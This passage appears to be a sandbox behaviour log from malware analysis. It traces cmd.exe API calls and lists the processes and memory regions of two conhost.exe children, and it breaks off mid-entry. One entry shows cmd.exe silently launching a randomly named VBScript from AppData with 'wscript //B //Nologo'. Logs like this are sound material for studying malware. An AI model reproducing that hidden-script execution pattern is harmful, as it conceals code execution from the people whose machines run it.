[0200.661] GetStartupInfoW (in: lpStartupInfo=0x58f0f8 | out: lpStartupInfo=0x58f0f8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0200.661] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0200.661] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0200.661] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0200.661] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.661] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.661] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0200.662] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0200.663] lstrcmpW (lpString1="\\wscript.exe", lpString2="\\XCOPY.EXE") returned -1 [0200.664] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\wscript.exe", lpCommandLine="wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x58f048*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x58f094 | out: lpCommandLine="wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"", lpProcessInformation=0x58f094*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xe2c, dwThreadId=0xb44)) returned 1 [0201.765] CloseHandle (hObject=0xa4) returned 1 [0201.765] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0201.765] GetEnvironmentStringsW () returned 0x619fc0* [0201.765] FreeEnvironmentStringsA (penv="=") returned 1 [0201.765] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0295.167] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x58f02c | out: lpExitCode=0x58f02c*=0x0) returned 1 [0295.167] CloseHandle (hObject=0xa8) returned 1 [0295.167] _vsnwprintf (in: _Buffer=0x58f114, _BufferCount=0x13, _Format="%08X", _ArgList=0x58f034 | out: _Buffer="00000000") returned 8 [0295.167] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0295.167] GetEnvironmentStringsW () returned 0x61b418* [0295.167] FreeEnvironmentStringsA (penv="=") returned 1 [0295.167] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0295.167] GetEnvironmentStringsW () returned 0x61b418* [0295.167] FreeEnvironmentStringsA (penv="=") returned 1 [0295.167] DeleteProcThreadAttributeList (in: lpAttributeList=0x58f0c0 | out: lpAttributeList=0x58f0c0) [0295.167] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.167] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0295.816] _get_osfhandle (_FileHandle=1) returned 0x3c [0295.816] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0296.017] _get_osfhandle (_FileHandle=0) returned 0x38 [0296.017] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0296.194] SetConsoleInputExeNameW () returned 0x1 [0296.194] GetConsoleOutputCP () returned 0x1b5 [0296.257] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0296.258] SetThreadUILanguage (LangId=0x0) returned 0x409 [0296.282] exit (_Code=0) Thread: id = 107 os_tid = 0xfec Process: id = "9" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x70781000" os_pid = "0xfac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xfa4" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 850 start_va = 0x7f5a1000 end_va = 0x7f5a1fff entry_point = 0x0 region_type = private name = "private_0x000000007f5a1000" filename = "" Region: id = 851 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 852 start_va = 0xc7c81c0000 end_va = 0xc7c81dffff entry_point = 0x0 region_type = private name = "private_0x000000c7c81c0000" filename = "" Region: id = 853 start_va = 0xc7c81e0000 end_va = 0xc7c81f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c81e0000" filename = "" Region: id = 854 start_va = 0xc7c8200000 end_va = 0xc7c823ffff entry_point = 0x0 region_type = private name = "private_0x000000c7c8200000" filename = "" Region: id = 855 start_va = 0x7df5ff7a0000 end_va = 0x7ff5ff79ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7a0000" filename = "" Region: id = 856 start_va = 0x7ff7fd360000 end_va = 0x7ff7fd382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd360000" filename = "" Region: id = 857 start_va = 0x7ff7fd38d000 end_va = 0x7ff7fd38efff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd38d000" filename = "" Region: id = 858 start_va = 0x7ff7fd38f000 end_va = 0x7ff7fd38ffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd38f000" filename = "" Region: id = 859 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 860 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 861 start_va = 0xc7c81c0000 end_va = 0xc7c81cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c81c0000" filename = "" Region: id = 862 start_va = 0xc7c8240000 end_va = 0xc7c833ffff entry_point = 0x0 region_type = private name = "private_0x000000c7c8240000" filename = "" Region: id = 863 start_va = 0xc7c8340000 end_va = 0xc7c83fdfff entry_point = 0xc7c8340000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 864 start_va = 0x7ff7fd260000 end_va = 0x7ff7fd35ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd260000" filename = "" Region: id = 865 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 866 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 867 start_va = 0xc7c81d0000 end_va = 0xc7c81d6fff entry_point = 0x0 region_type = private name = "private_0x000000c7c81d0000" filename = "" Region: id = 868 start_va = 0xc7c8400000 end_va = 0xc7c843ffff entry_point = 0x0 region_type = private name = "private_0x000000c7c8400000" filename = "" Region: id = 869 start_va = 0xc7c8440000 end_va = 0xc7c8440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c8440000" filename = "" Region: id = 870 start_va = 0xc7c8450000 end_va = 0xc7c8456fff entry_point = 0x0 region_type = private name = "private_0x000000c7c8450000" filename = "" Region: id = 871 start_va = 0xc7c85f0000 end_va = 0xc7c85fffff entry_point = 0x0 region_type = private name = "private_0x000000c7c85f0000" filename = "" Region: id = 872 start_va = 0x7ff7fd38b000 end_va = 0x7ff7fd38cfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd38b000" filename = "" Region: id = 873 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 874 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 875 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 876 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 877 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 878 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 879 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 880 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 881 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 882 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 883 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 884 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 925 start_va = 0xc7c8460000 end_va = 0xc7c85e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c8460000" filename = "" Region: id = 926 start_va = 0xc7c8600000 end_va = 0xc7c8780fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c8600000" filename = "" Region: id = 927 start_va = 0xc7c8790000 end_va = 0xc7c9b8ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c8790000" filename = "" Region: id = 928 start_va = 0xc7c9b90000 end_va = 0xc7c9b90fff entry_point = 0x0 region_type = private name = "private_0x000000c7c9b90000" filename = "" Region: id = 929 start_va = 0xc7c9ba0000 end_va = 0xc7c9ba0fff entry_point = 0x0 region_type = private name = "private_0x000000c7c9ba0000" filename = "" Region: id = 930 start_va = 0xc7c9bb0000 end_va = 0xc7c9beffff entry_point = 0x0 region_type = private name = "private_0x000000c7c9bb0000" filename = "" Region: id = 931 start_va = 0xc7c9d10000 end_va = 0xc7c9d1ffff entry_point = 0x0 region_type = private name = "private_0x000000c7c9d10000" filename = "" Region: id = 932 start_va = 0x7ff7fd389000 end_va = 0x7ff7fd38afff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd389000" filename = "" Region: id = 933 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 934 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 935 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 936 start_va = 0x7ffaf4590000 end_va = 0x7ffaf4bb7fff entry_point = 0x7ffaf4590000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 937 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 938 start_va = 0x7ffaf5990000 end_va = 0x7ffaf6eb4fff entry_point = 0x7ffaf5990000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 939 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 940 start_va = 0x7ffaf7860000 end_va = 0x7ffaf78b0fff entry_point = 0x7ffaf7860000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 941 start_va = 0x7ffaf2d10000 end_va = 0x7ffaf2da5fff entry_point = 0x7ffaf2d10000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 942 start_va = 0xc7c9bf0000 end_va = 0xc7c9cfcfff entry_point = 0x0 region_type = private name = "private_0x000000c7c9bf0000" filename = "" Region: id = 943 start_va = 0xc7c9d00000 end_va = 0xc7c9d03fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c9d00000" filename = "" Region: id = 944 start_va = 0xc7c9d20000 end_va = 0xc7c9e2cfff entry_point = 0x0 region_type = private name = "private_0x000000c7c9d20000" filename = "" Region: id = 945 start_va = 0xc7c9e70000 end_va = 0xc7c9e7ffff entry_point = 0x0 region_type = private name = "private_0x000000c7c9e70000" filename = "" Region: id = 946 start_va = 0xc7c9e80000 end_va = 0xc7ca1b6fff entry_point = 0xc7c9e80000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 947 start_va = 0xc7ca1c0000 end_va = 0xc7ca3d4fff entry_point = 0x0 region_type = private name = "private_0x000000c7ca1c0000" filename = "" Region: id = 948 start_va = 0xc7ca3e0000 end_va = 0xc7ca5fffff entry_point = 0x0 region_type = private name = "private_0x000000c7ca3e0000" filename = "" Region: id = 949 start_va = 0xc7ca600000 end_va = 0xc7ca812fff entry_point = 0x0 region_type = private name = "private_0x000000c7ca600000" filename = "" Region: id = 950 start_va = 0xc7ca820000 end_va = 0xc7ca8d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7ca820000" filename = "" Region: id = 951 start_va = 0x7ffaf24b0000 end_va = 0x7ffaf24d1fff entry_point = 0x7ffaf24b0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 952 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 953 start_va = 0x7ffaf35e0000 end_va = 0x7ffaf3637fff entry_point = 0x7ffaf35e0000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 9990 start_va = 0xc7c9e30000 end_va = 0xc7c9e36fff entry_point = 0x0 region_type = private name = "private_0x000000c7c9e30000" filename = "" Region: id = 9991 start_va = 0xc7c9e40000 end_va = 0xc7c9e44fff entry_point = 0xc7c9e40000 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 9992 start_va = 0xc7c9e50000 end_va = 0xc7c9e50fff entry_point = 0xc7c9e50000 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 9993 start_va = 0xc7c9e60000 end_va = 0xc7c9e61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000c7c9e60000" filename = "" Region: id = 9994 start_va = 0x7ffaecc30000 end_va = 0x7ffaecea3fff entry_point = 0x7ffaecc30000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_f41f7b285750ef43\\comctl32.dll") Thread: id = 94 os_tid = 0xfb0 Thread: id = 96 os_tid = 0xfbc Thread: id = 97 os_tid = 0xfc0 Thread: id = 103 os_tid = 0xfd8 Process: id = "10" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7174e000" os_pid = "0xfb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xf9c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 885 start_va = 0x7fe69000 end_va = 0x7fe69fff entry_point = 0x0 region_type = private name = "private_0x000000007fe69000" filename = "" Region: id = 886 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 887 start_va = 0xd20dab0000 end_va = 0xd20dacffff entry_point = 0x0 region_type = private name = "private_0x000000d20dab0000" filename = "" Region: id = 888 start_va = 0xd20dad0000 end_va = 0xd20dae3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20dad0000" filename = "" Region: id = 889 start_va = 0xd20daf0000 end_va = 0xd20db2ffff entry_point = 0x0 region_type = private name = "private_0x000000d20daf0000" filename = "" Region: id = 890 start_va = 0x7df5ffdd0000 end_va = 0x7ff5ffdcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffdd0000" filename = "" Region: id = 891 start_va = 0x7ff7fd0a0000 end_va = 0x7ff7fd0c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fd0a0000" filename = "" Region: id = 892 start_va = 0x7ff7fd0c4000 end_va = 0x7ff7fd0c4fff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd0c4000" filename = "" Region: id = 893 start_va = 0x7ff7fd0ce000 end_va = 0x7ff7fd0cffff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd0ce000" filename = "" Region: id = 894 start_va = 0x7ff7fd4c0000 end_va = 0x7ff7fd4d0fff entry_point = 0x7ff7fd4c0000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 895 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 896 start_va = 0xd20dab0000 end_va = 0xd20dabffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20dab0000" filename = "" Region: id = 897 start_va = 0xd20dac0000 end_va = 0xd20dac6fff entry_point = 0x0 region_type = private name = "private_0x000000d20dac0000" filename = "" Region: id = 898 start_va = 0xd20db30000 end_va = 0xd20dbedfff entry_point = 0xd20db30000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 899 start_va = 0xd20dbf0000 end_va = 0xd20dbf0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20dbf0000" filename = "" Region: id = 900 start_va = 0xd20dc00000 end_va = 0xd20dc06fff entry_point = 0x0 region_type = private name = "private_0x000000d20dc00000" filename = "" Region: id = 901 start_va = 0xd20dc10000 end_va = 0xd20dc10fff entry_point = 0x0 region_type = private name = "private_0x000000d20dc10000" filename = "" Region: id = 902 start_va = 0xd20dc20000 end_va = 0xd20dd1ffff entry_point = 0x0 region_type = private name = "private_0x000000d20dc20000" filename = "" Region: id = 903 start_va = 0xd20dd20000 end_va = 0xd20dd5ffff entry_point = 0x0 region_type = private name = "private_0x000000d20dd20000" filename = "" Region: id = 904 start_va = 0xd20dd60000 end_va = 0xd20dd60fff entry_point = 0x0 region_type = private name = "private_0x000000d20dd60000" filename = "" Region: id = 905 start_va = 0xd20dda0000 end_va = 0xd20ddaffff entry_point = 0x0 region_type = private name = "private_0x000000d20dda0000" filename = "" Region: id = 906 start_va = 0xd20ddb0000 end_va = 0xd20df37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20ddb0000" filename = "" Region: id = 907 start_va = 0xd20df40000 end_va = 0xd20e0c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20df40000" filename = "" Region: id = 908 start_va = 0xd20e0d0000 end_va = 0xd20f4cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000d20e0d0000" filename = "" Region: id = 909 start_va = 0x7ff7fcfa0000 end_va = 0x7ff7fd09ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7fcfa0000" filename = "" Region: id = 910 start_va = 0x7ff7fd0cc000 end_va = 0x7ff7fd0cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff7fd0cc000" filename = "" Region: id = 911 start_va = 0x7ffaed340000 end_va = 0x7ffaed392fff entry_point = 0x7ffaed340000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 912 start_va = 0x7ffaf1040000 end_va = 0x7ffaf11c2fff entry_point = 0x7ffaf1040000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 913 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 914 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 915 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = 